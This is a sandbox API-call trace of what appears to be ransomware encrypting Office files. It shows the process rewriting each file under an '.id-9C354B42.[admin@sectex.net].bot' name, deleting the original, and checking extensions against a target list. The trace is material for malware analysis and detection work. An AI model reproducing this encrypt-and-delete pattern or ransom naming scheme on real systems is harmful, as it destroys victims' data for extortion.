	[0153.541] WriteFile (in: hFile=0x1b8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x7a0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x7a0, lpOverlapped=0x0) returned 1
	[0153.542] ReadFile (in: hFile=0x3d4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.542] WriteFile (in: hFile=0x1b8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0153.542] SetEndOfFile (hFile=0x1b8) returned 1
	[0153.542] CloseHandle (hObject=0x1b8) returned 1
	[0153.542] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.543] SetEndOfFile (hFile=0x3d4) returned 1
	[0153.545] CloseHandle (hObject=0x3d4) returned 1
	[0153.545] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDALLLNK.VRD.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.546] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDALLLNK.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wdalllnk.vrd")) returned 1
	[0153.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDALLLNK.VRD") returned 60
	[0153.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDALLLNK.VRD") returned 60
	[0153.546] lstrlenW (lpString=".doc") returned 4
	[0153.546] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0153.546] lstrlenW (lpString=".docx") returned 5
	[0153.546] lstrcmpiW (lpString1=".docx", lpString2="K.VRD") returned -1
	[0153.546] lstrlenW (lpString=".pdf") returned 4
	[0153.546] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0153.546] lstrlenW (lpString=".xls") returned 4
	[0153.546] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0153.547] lstrlenW (lpString=".xlsx") returned 5
	[0153.547] lstrcmpiW (lpString1=".xlsx", lpString2="K.VRD") returned -1
	[0153.547] lstrlenW (lpString=".ppt") returned 4
	[0153.547] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0153.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDALLLNK.VRD") returned 60
	[0153.547] lstrlenW (lpString=".zip") returned 4
	[0153.547] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0153.547] lstrlenW (lpString=".rar") returned 4
	[0153.547] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0153.547] lstrlenW (lpString=".bz2") returned 4
	[0153.547] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0153.547] lstrlenW (lpString=".7z") returned 3
	[0153.547] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0153.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDALLLNK.VRD") returned 60
	[0153.547] lstrlenW (lpString=".dbf") returned 4
	[0153.547] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0153.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDALLLNK.VRD") returned 60
	[0153.547] lstrlenW (lpString=".1cd") returned 4
	[0153.547] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0153.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDALLLNK.VRD") returned 60
	[0153.547] lstrlenW (lpString=".jpg") returned 4
	[0153.547] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0153.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDALLLNK.VRD") returned 60
	[0153.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDALLLNK.VRD") returned 60
	[0153.547] lstrlenW (lpString=".doc") returned 4
	[0153.547] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0153.547] lstrlenW (lpString=".docx") returned 5
	[0153.547] lstrcmpiW (lpString1=".docx", lpString2="K.VRD") returned -1
	[0153.547] lstrlenW (lpString=".pdf") returned 4
	[0153.547] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0153.547] lstrlenW (lpString=".xls") returned 4
	[0153.548] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0153.548] lstrlenW (lpString=".xlsx") returned 5
	[0153.548] lstrcmpiW (lpString1=".xlsx", lpString2="K.VRD") returned -1
	[0153.548] lstrlenW (lpString=".ppt") returned 4
	[0153.548] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0153.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDALLLNK.VRD") returned 60
	[0153.548] lstrlenW (lpString=".zip") returned 4
	[0153.548] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0153.548] lstrlenW (lpString=".rar") returned 4
	[0153.548] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0153.548] lstrlenW (lpString=".bz2") returned 4
	[0153.548] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0153.548] lstrlenW (lpString=".7z") returned 3
	[0153.548] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0153.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDALLLNK.VRD") returned 60
	[0153.548] lstrlenW (lpString=".dbf") returned 4
	[0153.548] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0153.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDALLLNK.VRD") returned 60
	[0153.548] lstrlenW (lpString=".1cd") returned 4
	[0153.548] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0153.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDALLLNK.VRD") returned 60
	[0153.548] lstrlenW (lpString=".jpg") returned 4
	[0153.548] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0153.548] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0153.548] lstrlenW (lpString="WINPROJ.DEV_COL.HXC") returned 19
	[0153.548] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0153.556] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=651) returned 1
	[0153.556] CloseHandle (hObject=0x1b8) returned 1
	[0153.556] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_col.hxc")) returned 0x20
	[0153.562] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0153.562] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.562] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0153.563] GetLastError () returned 0x0
	[0153.563] ReadFile (in: hFile=0x1b8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x28b, lpOverlapped=0x0) returned 1
	[0153.566] WriteFile (in: hFile=0x3d4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x290, lpOverlapped=0x0) returned 1
	[0153.567] ReadFile (in: hFile=0x1b8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.567] WriteFile (in: hFile=0x3d4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0153.567] SetEndOfFile (hFile=0x3d4) returned 1
	[0153.567] CloseHandle (hObject=0x3d4) returned 1
	[0153.567] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.567] SetEndOfFile (hFile=0x1b8) returned 1
	[0153.569] CloseHandle (hObject=0x1b8) returned 1
	[0153.570] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.570] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_col.hxc")) returned 1
	[0153.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXC") returned 67
	[0153.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXC") returned 67
	[0153.570] lstrlenW (lpString=".doc") returned 4
	[0153.570] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0153.571] lstrlenW (lpString=".docx") returned 5
	[0153.571] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0153.571] lstrlenW (lpString=".pdf") returned 4
	[0153.571] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0153.571] lstrlenW (lpString=".xls") returned 4
	[0153.571] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0153.571] lstrlenW (lpString=".xlsx") returned 5
	[0153.571] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0153.571] lstrlenW (lpString=".ppt") returned 4
	[0153.571] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0153.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXC") returned 67
	[0153.571] lstrlenW (lpString=".zip") returned 4
	[0153.571] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0153.571] lstrlenW (lpString=".rar") returned 4
	[0153.571] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0153.571] lstrlenW (lpString=".bz2") returned 4
	[0153.571] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0153.571] lstrlenW (lpString=".7z") returned 3
	[0153.571] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0153.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXC") returned 67
	[0153.571] lstrlenW (lpString=".dbf") returned 4
	[0153.571] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0153.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXC") returned 67
	[0153.571] lstrlenW (lpString=".1cd") returned 4
	[0153.571] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0153.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXC") returned 67
	[0153.571] lstrlenW (lpString=".jpg") returned 4
	[0153.571] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0153.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXC") returned 67
	[0153.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXC") returned 67
	[0153.572] lstrlenW (lpString=".doc") returned 4
	[0153.572] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0153.572] lstrlenW (lpString=".docx") returned 5
	[0153.572] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0153.572] lstrlenW (lpString=".pdf") returned 4
	[0153.572] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0153.572] lstrlenW (lpString=".xls") returned 4
	[0153.572] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0153.572] lstrlenW (lpString=".xlsx") returned 5
	[0153.572] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0153.572] lstrlenW (lpString=".ppt") returned 4
	[0153.572] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0153.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXC") returned 67
	[0153.572] lstrlenW (lpString=".zip") returned 4
	[0153.572] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0153.572] lstrlenW (lpString=".rar") returned 4
	[0153.572] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0153.572] lstrlenW (lpString=".bz2") returned 4
	[0153.572] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0153.572] lstrlenW (lpString=".7z") returned 3
	[0153.572] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0153.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXC") returned 67
	[0153.572] lstrlenW (lpString=".dbf") returned 4
	[0153.572] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0153.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXC") returned 67
	[0153.572] lstrlenW (lpString=".1cd") returned 4
	[0153.572] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0153.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXC") returned 67
	[0153.572] lstrlenW (lpString=".jpg") returned 4
	[0153.572] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0153.573] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0153.573] lstrlenW (lpString="WINPROJ.DEV_F_COL.HXK") returned 21
	[0153.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0153.601] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=114) returned 1
	[0153.601] CloseHandle (hObject=0x1b8) returned 1
	[0153.601] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_f_col.hxk")) returned 0x20
	[0153.601] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0153.601] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.601] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.602] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0153.602] GetLastError () returned 0x0
	[0153.602] ReadFile (in: hFile=0x1b8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x72, lpOverlapped=0x0) returned 1
	[0153.606] WriteFile (in: hFile=0x3d4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0153.607] ReadFile (in: hFile=0x1b8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.607] WriteFile (in: hFile=0x3d4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xfe, lpOverlapped=0x0) returned 1
	[0153.607] SetEndOfFile (hFile=0x3d4) returned 1
	[0153.607] CloseHandle (hObject=0x3d4) returned 1
	[0153.608] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.608] SetEndOfFile (hFile=0x1b8) returned 1
	[0153.610] CloseHandle (hObject=0x1b8) returned 1
	[0153.610] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.610] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_f_col.hxk")) returned 1
	[0153.611] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_F_COL.HXK") returned 69
	[0153.611] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_F_COL.HXK") returned 69
	[0153.611] lstrlenW (lpString=".doc") returned 4
	[0153.611] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0153.611] lstrlenW (lpString=".docx") returned 5
	[0153.611] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0153.611] lstrlenW (lpString=".pdf") returned 4
	[0153.611] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0153.611] lstrlenW (lpString=".xls") returned 4
	[0153.611] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0153.611] lstrlenW (lpString=".xlsx") returned 5
	[0153.611] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0153.611] lstrlenW (lpString=".ppt") returned 4
	[0153.611] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0153.611] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_F_COL.HXK") returned 69
	[0153.611] lstrlenW (lpString=".zip") returned 4
	[0153.611] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0153.611] lstrlenW (lpString=".rar") returned 4
	[0153.611] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0153.611] lstrlenW (lpString=".bz2") returned 4
	[0153.611] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0153.612] lstrlenW (lpString=".7z") returned 3
	[0153.612] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0153.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_F_COL.HXK") returned 69
	[0153.612] lstrlenW (lpString=".dbf") returned 4
	[0153.612] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0153.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_F_COL.HXK") returned 69
	[0153.612] lstrlenW (lpString=".1cd") returned 4
	[0153.612] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0153.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_F_COL.HXK") returned 69
	[0153.612] lstrlenW (lpString=".jpg") returned 4
	[0153.612] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0153.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_F_COL.HXK") returned 69
	[0153.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_F_COL.HXK") returned 69
	[0153.612] lstrlenW (lpString=".doc") returned 4
	[0153.612] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0153.612] lstrlenW (lpString=".docx") returned 5
	[0153.612] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0153.612] lstrlenW (lpString=".pdf") returned 4
	[0153.612] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0153.612] lstrlenW (lpString=".xls") returned 4
	[0153.612] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0153.612] lstrlenW (lpString=".xlsx") returned 5
	[0153.612] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0153.612] lstrlenW (lpString=".ppt") returned 4
	[0153.612] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0153.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_F_COL.HXK") returned 69
	[0153.612] lstrlenW (lpString=".zip") returned 4
	[0153.612] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0153.612] lstrlenW (lpString=".rar") returned 4
	[0153.612] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0153.612] lstrlenW (lpString=".bz2") returned 4
	[0153.613] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0153.613] lstrlenW (lpString=".7z") returned 3
	[0153.613] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0153.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_F_COL.HXK") returned 69
	[0153.613] lstrlenW (lpString=".dbf") returned 4
	[0153.613] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0153.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_F_COL.HXK") returned 69
	[0153.613] lstrlenW (lpString=".1cd") returned 4
	[0153.613] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0153.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_F_COL.HXK") returned 69
	[0153.613] lstrlenW (lpString=".jpg") returned 4
	[0153.613] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0153.613] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0153.613] lstrlenW (lpString="WINPROJ.DEV_K_COL.HXK") returned 21
	[0153.613] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0153.909] GetFileSizeEx (in: hFile=0x3c8, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=113) returned 1
	[0153.911] CloseHandle (hObject=0x3c8) returned 1
	[0153.915] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_k_col.hxk")) returned 0x20
	[0153.919] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0153.939] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.939] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.939] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0153.940] GetLastError () returned 0x0
	[0153.940] ReadFile (in: hFile=0x268, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x71, lpOverlapped=0x0) returned 1
